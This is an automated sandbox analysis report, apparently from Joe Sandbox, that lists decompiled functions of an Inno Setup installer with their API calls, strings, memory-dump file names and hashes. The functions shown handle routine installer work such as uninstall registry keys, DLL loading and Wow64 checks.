Function 0046E080 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 480
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0046DE6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F

RegCloseKey.ADVAPI32(?,0046E6E1,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E72C,?,?,0049B178,00000000), ref: 0046E6D4

Strings

Inno Setup: Selected Tasks, xrefs: 0046E297
NoRepair, xrefs: 0046E546
Software\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 0046E0D6
MajorVersion, xrefs: 0046E591
NoModify, xrefs: 0046E532
Inno Setup: Selected Components, xrefs: 0046E250
EstimatedSize, xrefs: 0046E651
Comments, xrefs: 0046E4FE
Inno Setup: App Path, xrefs: 0046E1A6
Inno Setup: Icon Group, xrefs: 0046E1D5
Inno Setup: No Icons, xrefs: 0046E1F3
ModifyPath, xrefs: 0046E51E
Inno Setup: User, xrefs: 0046E212
Inno Setup: Deselected Tasks, xrefs: 0046E2B6
Inno Setup: User Info: Name, xrefs: 0046E2CE
Inno Setup: Deselected Components, xrefs: 0046E26F
HelpTelephone, xrefs: 0046E46D
Publisher, xrefs: 0046E433
MinorVersion, xrefs: 0046E5A3
RegisterPreviousData, xrefs: 0046E68A
" /SILENT, xrefs: 0046E3EC
InstallLocation, xrefs: 0046E1C6
Inno Setup: Setup Type, xrefs: 0046E231
Contact, xrefs: 0046E4E1
5.4.0 (a), xrefs: 0046E176
UninstallString, xrefs: 0046E3BF
URLUpdateInfo, xrefs: 0046E4A7
Inno Setup: User Info: Organization, xrefs: 0046E2E3
DisplayName, xrefs: 0046E368
_is1, xrefs: 0046E0DC
Inno Setup: Setup Version, xrefs: 0046E171
Inno Setup: Language, xrefs: 0046E31F
InstallDate, xrefs: 0046E565
HelpLink, xrefs: 0046E48A
QuietUninstallString, xrefs: 0046E3F9
DisplayIcon, xrefs: 0046E385
Readme, xrefs: 0046E4C4
Inno Setup: User Info: Serial, xrefs: 0046E2F8
DisplayVersion, xrefs: 0046E416
URLInfoAbout, xrefs: 0046E450

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseValue
String ID: " /SILENT$5.4.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
API String ID: 3132538880-1122008755
Opcode ID: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
Instruction ID: d6e88d1f6cb7b2cefc9fba2fbd39931f8be9331f85677ee55fb68547bd3bf3cf
Opcode Fuzzy Hash: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
Instruction Fuzzy Hash: C3123034F001089BCB04EB56E981ADE77F5EF58304F60807BE8116B3A5EB79AD45CB5A

Function 00490C98 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000000,0049118D,?,?,?,?,00000000,00000000,00000000), ref: 00490CD8
FindWindowA.USER32(00000000,00000000), ref: 00490D09

Strings

FREEDLL, xrefs: 00491084
SENDBROADCASTNOTIFYMESSAGE, xrefs: 00490F47
SENDMESSAGE, xrefs: 00490D5D
CHARTOOEMBUFF, xrefs: 0049112E
CREATEMUTEX, xrefs: 004910B9
REGISTERWINDOWMESSAGE, xrefs: 00490E6B
FINDWINDOWBYWINDOWNAME, xrefs: 00490D21
FINDWINDOWBYCLASSNAME, xrefs: 00490CE5
POSTMESSAGE, xrefs: 00490DB3
OEMTOCHARBUFF, xrefs: 004910EB
SLEEP, xrefs: 00490CC2
SENDBROADCASTMESSAGE, xrefs: 00490EA5
POSTBROADCASTMESSAGE, xrefs: 00490EF3
LOADDLL, xrefs: 00490F9B
CALLDLLPROC, xrefs: 00490FFD
SENDNOTIFYMESSAGE, xrefs: 00490E0F

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FindSleepWindow
String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
API String ID: 3078808852-3310373309
Opcode ID: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
Instruction ID: 3689c34fe079b887eecbe3c8abd258a9be24a9666ebde3bfb919725182042c62
Opcode Fuzzy Hash: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
Instruction Fuzzy Hash: 8EC19C60B002026BDB14BB3E8C8291E599A9FC9708B11D93FF546EB79ACD3DDD06435E

Function 00481DF0 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00481E01
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00481E0E
GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E1C
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00481E24
GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00481E30
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481E51
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481E64
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00481E6A
GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E81

Strings

GetSystemWow64DirectoryA, xrefs: 00481E4B
kernel32.dll, xrefs: 00481DFC
IsWow64Process, xrefs: 00481E1E
advapi32.dll, xrefs: 00481E5F
GetNativeSystemInfo, xrefs: 00481E08
RegDeleteKeyExA, xrefs: 00481E5A

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
API String ID: 2230631259-2623177817
Opcode ID: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
Instruction ID: 139b281cd70ff203116dc437a84a2e67e00dfa051846aebc7d59a7e7d95df608
Opcode Fuzzy Hash: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
Instruction Fuzzy Hash: B1110D41504341D4DB2077BA6C45B7F2A8C8B11319F080C3B6C50662F3CA7C8887DBAF

Function 00472708 Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 585
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?,0049B178), ref: 00472890
RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 00472899

Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9

RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472CF0,?,?,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 004729B7

Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38

Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF

Strings

olddata, xrefs: 00472ABA, 00472B19
Cannot access 64-bit registry keys on this version of Windows, xrefs: 004727E6
break, xrefs: 00472B27
{olddata}, xrefs: 00472A4F, 00472AE6
Failed to parse "qword" value, xrefs: 00472C43

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: DeleteErrorLastValue$CloseCreate
String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
API String ID: 2638610037-3092547568
Opcode ID: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
Instruction ID: 0e42c6b5a9d89693cebc7f702fd10ac1157821fa568552e70b891395feb5272a
Opcode Fuzzy Hash: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
Instruction Fuzzy Hash: BE320D74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59

Function 004684C8 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,004686E2,?,?,00000001,00000000,00000000,004686FD,?,00000000,00000000,?), ref: 004686CB

Strings

Inno Setup: User Info: Organization, xrefs: 0046869A
Inno Setup: Selected Components, xrefs: 004685EA
Inno Setup: User Info: Serial, xrefs: 004686AD
Inno Setup: No Icons, xrefs: 004685B3
Inno Setup: Selected Tasks, xrefs: 00468637
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468527
%s\%s_is1, xrefs: 00468545
Inno Setup: App Path, xrefs: 0046858A
Inno Setup: Deselected Components, xrefs: 0046860C
Inno Setup: Deselected Tasks, xrefs: 00468659
Inno Setup: User Info: Name, xrefs: 00468687
Inno Setup: Setup Type, xrefs: 004685DA
Inno Setup: Icon Group, xrefs: 004685A6

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseOpen
String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1093091907
Opcode ID: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
Instruction ID: 9e5fcdcadd17e924e807c4804dd8b09e3b38f40da8ec3e6eb3bcc5aac06a0e07
Opcode Fuzzy Hash: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
Instruction Fuzzy Hash: 7751B570A002089BDB11DB65D9416DEB7F5EF49304FA086BEE840A7391EF78AE05CB5D

Function 0047B8DC Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74A90000,SHGetFolderPathA), ref: 0047B9DE

Strings

SHGetFolderPathA, xrefs: 0047B9D3
Failed to get version numbers of _shfoldr.dll, xrefs: 0047B934
Failed to get address of SHGetFolderPath function, xrefs: 0047B9EF
shfolder.dll, xrefs: 0047B941, 0047B97A
j]I, xrefs: 0047B925, 0047B96A, 0047B952, 0047B95A
shell32.dll, xrefs: 0047B989
Failed to load DLL "%s", xrefs: 0047B9C1
_isetup\_shfoldr.dll, xrefs: 0047B90E
SHFOLDERDLL, xrefs: 0047B91B

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$j]I$shell32.dll$shfolder.dll
API String ID: 190572456-2632518235
Opcode ID: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
Instruction ID: 54e288ff13d65e77707e80ace3ca021a5634fe8f765e4003a0d502320fe0c017
Opcode Fuzzy Hash: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
Instruction Fuzzy Hash: 62311DB0A00249DFCB10EB95D982AEEB7B4EF44308F50847BE554E7352D7389E458BAD

Function 0047B5B0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B643
GetLastError.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B64C

Strings

\_RegDLL.tmp, xrefs: 0047B6B0
REGDLL_EXE, xrefs: 0047B6C0
oI, xrefs: 0047B708, 0047B67A, 0047B684
Created temporary directory: , xrefs: 0047B5E5
\_setup64.tmp, xrefs: 0047B6DB
_isetup, xrefs: 0047B62E
oI, xrefs: 0047B657, 0047B664

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$oI$oI
API String ID: 1375471231-857235331
Opcode ID: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
Instruction ID: c69cc1ab8f896661f98e1b5ecb406916ff938ef434e98a02422d0df200dcf9d8
Opcode Fuzzy Hash: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
Instruction Fuzzy Hash: 45415C34A002099FCB04EFA5D992ADEB7B5EF48309F50843BE51477392DB389E058B99

Function 00406334 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E

Strings

SetDllDirectoryW, xrefs: 00406341
kernel32.dll, xrefs: 00406335
SetSearchPathMode, xrefs: 00406357
SetProcessDEPPolicy, xrefs: 0040636D

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$HandleModulePolicyProcess
String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
API String ID: 3256987805-3653653586
Opcode ID: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
Opcode Fuzzy Hash: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

Function 00423884 Relevance: 15.1, APIs: 10, Instructions: 98
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2

GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
RegisterClassA.USER32(00498630), ref: 004238C7
GetSystemMetrics.USER32(00000000), ref: 004238E9
GetSystemMetrics.USER32(00000001), ref: 004238F8
SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
String ID:
API String ID: 183575631-0
Opcode ID: 49e735772f48ae54fcb5fe38930a04ff9474ea8db1f89588e4f946a5e3ff9012
Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
Opcode Fuzzy Hash: 49e735772f48ae54fcb5fe38930a04ff9474ea8db1f89588e4f946a5e3ff9012
Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D

Function 0042F3D4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 0042F403
GetFocus.USER32 ref: 0042F40B
RegisterClassA.USER32(004987AC), ref: 0042F42C
CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457A52,00000000,0049A628), ref: 0042F4C8

Strings

TWindowDisabler-Window, xrefs: 0042F463, 0042F4A9

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$CreateFocus$ActiveClassRegisterShow
String ID: TWindowDisabler-Window
API String ID: 3167913817-1824977358
Opcode ID: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
Opcode Fuzzy Hash: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE

Function 00452850 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890

Strings

kernel32.dll, xrefs: 0045286B, 00452885
Wow64RevertWow64FsRedirection, xrefs: 00452880
shell32.dll, xrefs: 004528BC
Wow64DisableWow64FsRedirection, xrefs: 00452866

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
Instruction ID: 1764834aba405073ceae9d3f2b1e241b80e40901185f6bd62a0f27775e5f306d
Opcode Fuzzy Hash: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
Instruction Fuzzy Hash: DB0188B0300300EED701BBA29D03B9B3A58EB56725F50443BF80066287D7FC4909DABD

Function 00466898 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961

Part of subcall function 004667D8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466870
Part of subcall function 004667D8: DestroyCursor.USER32(00000000), ref: 00466886

ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466A19
ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A3F

Strings

shell32.dll, xrefs: 0046699C
c:\directory, xrefs: 00466936

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

